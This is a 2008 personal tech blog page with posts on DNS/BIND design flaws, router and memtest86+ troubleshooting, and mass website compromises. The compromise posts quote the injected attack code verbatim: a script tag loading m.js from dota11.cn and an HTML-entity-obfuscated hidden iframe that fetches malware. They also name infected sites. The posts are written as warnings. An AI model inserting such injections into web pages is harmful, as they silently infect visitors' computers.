Comet.aaazen.com   Comet Blog

Ramblings of Comet--Berkeley   Blog Feed


Internet Design Vulnerability - DNS and BIND (permalink):
Tuesday, August 26, 2008   11:20:00 AM PDT

The internet was originally designed by military scientists to be invulnerable to physical attacks on centralized switching/routing facilities.

So the internet does not rely on a centralized routing system but instead relies on a distributed routing system.

Where were the issues of identification, authorization, etc that are so vital to business accounting covered?

These business/security issues were never in the original design...

DNS and BIND

DNS, domain name resolution, is a critical piece of the internet. It is the process by which a domain name such as "google.com" is turned into a number such as 64.233.167.99

It is something that everyone's web browser does silently every time a web link is accessed and most people don't pay much attention to it.

Every time you ask your web browser for a page it goes out to the internet, typically to a server called "BIND" that is provided by your ISP, internet service provider. BIND takes the domain name that the web browser provides and returns back an ip address. It takes google.com and returns 64.233.167.99

D. J. Bernstein hated the internet standard BIND program for DNS resolution so much that the decided to write his own DNS resolver, djbdns:

I was curious about why he re-wrote BIND and had no particular opinion about it until I saw the recent debacle with DNS BIND caching this July:

And the fix announced at the August Defcon and then the unfix reported by a Russian hacker in the New York Times:

Bind has lots of problems and they are not just programming problems but basic design problems.

To quote the NY Times article, "The root of the problem lies in the fact that the address system, which was invented in 1983, was not meant for services like electronic banking that require strict verification of identity."

djbdns is a step in the right direction but it is not enough as the current DNS system is flawed from the beginning and will always be vulnerable to forgery.

As D. J. Bernstein says in his article on DNS Forgery, "An attacker with access to your network can easily forge responses to your computer's DNS requests."

He suggests using public key cryptography and maybe that is the best solution for now.

Of course the ideal solution is to not do banking/accounting/etc at all on a public networks, but only on private networks.

Tomato eth%d: 3.90.38.0 driver failed with code 23 (permalink):
Tuesday, June 24, 2008   10:13:00 PM PDT

My Linksys WRT54G wireless router stopped transmitting/receiving and I could not figure it out.

I tried resetting the wlan connection, rebooting the router and finally unplugging/plugging the power connection.

None of this worked to make the "wireless" part of the router work again.

There was a system log message showing that the eth1 interface was not working though:

eth%d: 3.90.38.0 driver failed with code 23

After doing some web research on OpenWRT I was finally able to fix the problem.

I ssh-ed into the router and issued this command:

insmod wl

And the system log immediately showed this:

eth1: Broadcom BCM4320 802.11 Wireless Controller

Yet More Green Zone Hacking (permalink):
Sunday, June 01, 2008   02:30:00 PM PDT

The dota11.cn problem mentioned in my Wednesday/Thursday blog is getting worse.

When I do this Google search for the hackers script insertion, I now find over 280,000 hits whereas on Thursday I was finding only around 210,000.

Clearly this problem is growing.
As a precaution, I recommended several things in my last blog.
Using an Apple computer is not a bad idea either, but there is really no inherent safety in using Linux or an Apple computer except that the hackers go for Windows machines because they are the most popular.

The root cause of these kinds of problems is that we allow almost any web site to run code on our home machines.
In a professional business computing environment this should never be allowed.

But somehow it has become "acceptable" for home users. So the safest thing for home users is to never do "business" on their home computers. Never do online banking or commerce.

The Internet never was designed for business/security and it's best uses are probably educational, entertainment and socializing.

More Hacked in the Green Zone (permalink):
Thursday, May 29, 2008   09:52:00 AM PDT

May 28, 8:47 AM PDT (GMT-7)
So called "trusted" web sites are no longer trustworthy as I reported in my earlier blog:
Hacked in the Green Zone

The good news is that the San Francisco Chronicle reported on this on May 6, 2008:
Internet criminals gaining ground, experts say

The bad news is that I found a new problem. And I did not see that anyone else has picked up on the problem.

Here is what I found. On the morning of Tuesday May 27, 2008 the StarIQ.com Daily Horoscope was hacked. Embedded inside of the description for each sign of the zodiac was a tag like this:

<script src=http://www.dota11.cn/m.js></script>

So if a Windows computer user clicked on his sign, then he would download some spambot, virus or who knows what from several web sites registered in China.

Essentially, the home computer is compromised and the hacker can do anything he likes with the machine.

Is StarIQ.com the only web site to have this problem?

Heck no. Doing a google search comes up with over 200,000 hits.
Thousands of these websites are still infected!

Examples: (Don't go to these websites unless you are protected!)
 www.morrellwinebar.com
 www.bioimmune.com
 www.americancapitalrealty.net

How did this happen? I would like to know. Somehow hackers are compromising thousands of web sites like StarIQ.com and changing their web pages.

What can the average home computer user do? Use the Firefox web browser with the NoScript add-on.

Another option is to just not use Windows, use Linux.

Update May 29 9:53 AM PDT

I reported the problem to Google.com and they flagged dota11.cn as a "bad" website. So if you do a Google search and try to click on an infected website, then a warning page appears first.

The "cause" of the infection appears to be by SQL injection into the Microsoft SQL server by use of custom variables to a web form input, the same old web cgi, client-server problems that have been around for decades.

Here is a technical description of the problem:

www.0x000000.com

TeX4ht for Slackware (permalink):
Wednesday, May 21, 2008   10:10:00 AM PDT

I installed the build system for OpenWRT and wanted to create the html from the LaTeX documents, but my standard Slackware release 12.0 did not have the "htlatex" command.

Doing a Google, I found "htlatex" as part of TeX4ht at:

  www.cse.ohio-state.edu/~gurari/TeX4ht/

There is an old Slackware 10 version of TeX4ht at LinuxPackages but I could not get it to work.

So I downloaded the source from the Ohio State site and created my own Slackware 12.0 package for download:

  tex4ht-2.0

The package might work on Zenwalk too because it is based on Slackware.

System Outage (permalink):
Thursday, May 15, 2008   09:11:00 PM PDT
This evening my DSL modem, a Speedstream 4100, stopped working and it took me several hours to get the web server back online. Fortunately I had a spare modem and was able to get the system back up fairly quickly. Otherwise it might have taken me a day or more...

Bram's BitTorrent Challenge (permalink):
Wednesday, April 30, 2008   12:34:00 PM PDT

Here are my answers to some of Bram Cohen's challenge puzzles:


Hacked in the Green Zone (permalink):
Friday, April 18, 2008   11:24:00 AM PDT

Iframe attacks are becoming very common as many websites are vulnerable.

The hackers in this case are not simply attacking the PC users but attacking the web servers themselves aka the "Green Zone".

See this article by Roger Grimes on March 21.

Typically all pages at the hacked website will include code at the bottom of each page similar to this:

<iframe src="&#104;&#116;&#116;&#112;&#58;&#47;&#47;&#99;&#100;&#112;&#117;&#118;&#98;&#104;&#102;&#122;&#122;&#46;&#99;&#111;&#109;&#47;&#100;&#108;&#47;&#97;&#100;&#118;&#53;&#57;&#56;&#46;&#112;&#104;&#112;"
width=1 height=1></iframe>

which translates into something like this on the users computer:

<iframe src="http://cdpuvbhfzz.com/dl/adv598.php"
width=1 height=1></iframe>

When an unsuspecting user clicks on a trusted website he downloads spyware, viruses, etc as described in this article at CastleCops



memtest86+ v2.01 good 80808080 bad 80808000 (permalink):
Wednesday, April 09, 2008   12:46:00 PM PDT
I recently tested a Pentium 4 system with an Intel motherboard by running memtest86+ to check out the ram memory chips.

I kept getting the following error no matter how I swapped around the memory chips on the motherboard:

   Test #3
   Address: 00000100020 1.0MB
   Good: 80808080
   Bad: 80808000

I would try one chip and then the other. I moved the two chips around the 4 available memory slots on the motherboard, but still got the same results.

The system seemed to be very stable and so the memory test error did not make sense.

I did a search on google and found the following forum thread:

http://forum.x86-secret.com/archive/index.php?t-3670.html

And finally figured out that the error comes from plugging the mouse into a USB port instead of plugging it into the standard PS/2 port...

In fact I can "crash" memtest86+ every time just by moving the mouse when it gets to test #3.

But if the mouse is plugged into the PS/2 port, then there is no memory error and moving the mouse has no effect.

Moral of the story?

"If you take a test and fail, but everything checks out ok otherwise, then ignore the test."

or

"Stop playing around with your mouse and plug it into the right slot...."
Comet Home Page
last modified on 2013 May 28
Please send comments to: webmaster@comet.aaazen.com